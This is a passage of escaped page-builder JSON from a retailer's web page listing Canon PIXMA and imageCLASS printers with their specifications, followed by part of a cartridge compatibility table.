]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"    <table width=\\\"378\\\" border=\\\"1\\\">\\n      <tbody>\\n      <tr>\\n        <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n        <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n        <td>Maintenance Cartridge MC-20<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Blue)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Chroma Optimizer)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Gray)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Matte Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Gray)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Red)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n        <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n        <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n        <td>CL-57 (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>CL-57S (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PG-47 (Pigment Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n        <td>CL-57 (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>CL-57S (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PG-47 (Pigment Black)<\\/td>\\n      <\\/tr>\\n      <\\/tbody>\\n    <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA 